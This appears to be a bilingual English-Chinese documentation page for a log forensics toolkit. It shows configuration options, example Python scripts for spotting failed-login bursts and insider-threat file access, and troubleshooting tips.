LOG_TIMEZONE
Default timezone for log parsingNoUTC
EVTX_PARSER
Path to EVTX parser binaryNoBuilt-in
GEOIP_DB
Path to GeoIP databaseNoNone
YARA_RULES
Path to YARA rules for log analysisNoNone
变量描述是否必填默认值
LOG_TIMEZONE
日志解析的默认时区UTC
EVTX_PARSER
EVTX解析器二进制文件路径内置
GEOIP_DB
GeoIP数据库路径None
YARA_RULES
用于日志分析的YARA规则路径None

Options

选项

OptionTypeDescription
normalize_timestamps
booleanNormalize all timestamps to UTC
parallel_parsing
booleanEnable parallel log parsing
cache_parsed
booleanCache parsed log entries
max_memory_mb
integerMaximum memory for log processing
chunk_size
integerLines to process per chunk
选项类型描述
normalize_timestamps
布尔值将所有时间戳标准化为UTC
parallel_parsing
布尔值启用并行日志解析
cache_parsed
布尔值缓存解析后的日志条目
max_memory_mb
整数日志处理的最大内存限制
chunk_size
整数每个处理块的行数

Examples

示例场景

Example 1: Investigating Unauthorized Access

示例1:调查未授权访问

Scenario: Detecting and analyzing unauthorized system access
python
from log_forensics import EventLogParser, AuthenticationAnalyzer
场景:检测并分析未授权系统访问
python
from log_forensics import EventLogParser, AuthenticationAnalyzer

Parse Security event log

Parse Security event log

parser = EventLogParser("/evidence/Security.evtx")
parser = EventLogParser("/evidence/Security.evtx")

Get failed login attempts

Get failed login attempts

failed = parser.get_failed_logins() print(f"Total failed logins: {len(failed)}")
failed = parser.get_failed_logins() print(f"Total failed logins: {len(failed)}")

Group by target account

Group by target account

accounts = {} for f in failed: if f.target_account not in accounts: accounts[f.target_account] = [] accounts[f.target_account].append(f)
accounts = {} for f in failed: if f.target_account not in accounts: accounts[f.target_account] = [] accounts[f.target_account].append(f)

Find accounts with many failures

Find accounts with many failures

for account, failures in accounts.items(): if len(failures) > 10: print(f"Account: {account}") print(f" Failures: {len(failures)}") unique_ips = set(f.source_ip for f in failures) print(f" Source IPs: {unique_ips}")
for account, failures in accounts.items(): if len(failures) > 10: print(f"Account: {account}") print(f" Failures: {len(failures)}") unique_ips = set(f.source_ip for f in failures) print(f" Source IPs: {unique_ips}")

Check for successful logins after failures

Check for successful logins after failures

auth_analyzer = AuthenticationAnalyzer() auth_analyzer.add_parser(parser) compromise_indicators = auth_analyzer.find_success_after_failure()
undefined
auth_analyzer = AuthenticationAnalyzer() auth_analyzer.add_parser(parser) compromise_indicators = auth_analyzer.find_success_after_failure()
undefined

Example 2: Insider Threat Investigation

示例2:内部威胁调查

Scenario: Analyzing logs for insider threat indicators
python
from log_forensics import LogCorrelator, EventLogParser, FileAccessParser
场景:分析日志以识别内部威胁指标
python
from log_forensics import LogCorrelator, EventLogParser, FileAccessParser

Combine multiple log sources

Combine multiple log sources

correlator = LogCorrelator() correlator.add_source("security", EventLogParser("/evidence/Security.evtx")) correlator.add_source("files", FileAccessParser("/evidence/file_audit.evtx"))
correlator = LogCorrelator() correlator.add_source("security", EventLogParser("/evidence/Security.evtx")) correlator.add_source("files", FileAccessParser("/evidence/file_audit.evtx"))

Analyze specific user's activity

Analyze specific user's activity

user = "john.smith" user_timeline = correlator.get_user_activity(user)
user = "john.smith" user_timeline = correlator.get_user_activity(user)

Look for data collection indicators

Look for data collection indicators

data_access = correlator.find_bulk_file_access( user=user, threshold=100, time_window_hours=1 )
data_access = correlator.find_bulk_file_access( user=user, threshold=100, time_window_hours=1 )

Check for off-hours activity

Check for off-hours activity

off_hours = correlator.find_off_hours_activity( user=user, business_hours=(9, 18), business_days=[0, 1, 2, 3, 4] # Mon-Fri )
off_hours = correlator.find_off_hours_activity( user=user, business_hours=(9, 18), business_days=[0, 1, 2, 3, 4] # 周一至周五 )

Generate insider threat report

Generate insider threat report

correlator.generate_insider_report(user, "/evidence/insider_report.html")
undefined
correlator.generate_insider_report(user, "/evidence/insider_report.html")
undefined

Limitations

局限性

  • Large log files may require significant memory
  • Some log formats may not be fully supported
  • Timestamp parsing depends on consistent formats
  • Anomaly detection requires sufficient baseline data
  • Real-time analysis not supported
  • Encrypted logs cannot be parsed
  • Log rotation may cause gaps in analysis
  • 大型日志文件可能需要大量内存
  • 部分日志格式可能未完全支持
  • 时间戳解析依赖于格式的一致性
  • 异常检测需要足够的基准数据
  • 不支持实时分析
  • 无法解析加密日志
  • 日志轮转可能导致分析出现缺口

Troubleshooting

故障排除

Common Issue 1: EVTX Parsing Errors

常见问题1:EVTX解析错误

Problem: Unable to parse Windows Event Log Solution:
  • Check file for corruption
  • Ensure file is complete (not truncated)
  • Try alternative parser
问题:无法解析Windows事件日志 解决方案:
  • 检查文件是否损坏
  • 确保文件完整(未被截断)
  • 尝试使用其他解析器

Common Issue 2: Timestamp Misalignment

常见问题2:时间戳对齐错误

Problem: Events from different sources don't correlate Solution:
  • Verify source timezones
  • Use normalize_timestamps option
  • Check for clock skew
问题:不同来源的事件无法关联 解决方案:
  • 验证源时区设置
  • 使用normalize_timestamps选项
  • 检查时钟偏差

Common Issue 3: Memory Exhaustion

常见问题3:内存耗尽

Problem: Out of memory on large log files Solution:
  • Use streaming mode
  • Process in chunks
  • Increase max_memory_mb setting
问题:处理大型日志文件时出现内存不足 解决方案:
  • 使用流模式
  • 分块处理
  • 增加max_memory_mb设置

Related Skills

相关工具

  • timeline-forensics: Super timeline creation
  • memory-forensics: Correlate with memory analysis
  • network-forensics: Correlate with network captures
  • registry-forensics: Windows registry analysis
  • incident-response: IR workflow integration
  • timeline-forensics: 超级时间线创建工具
  • memory-forensics: 与内存分析关联
  • network-forensics: 与网络捕获关联
  • registry-forensics: Windows注册表分析
  • incident-response: 事件响应工作流集成

References

参考资料

  • Log Forensics Reference
  • Windows Event ID Guide
  • Log Format Specifications
  • 日志取证参考文档
  • Windows事件ID指南
  • 日志格式规范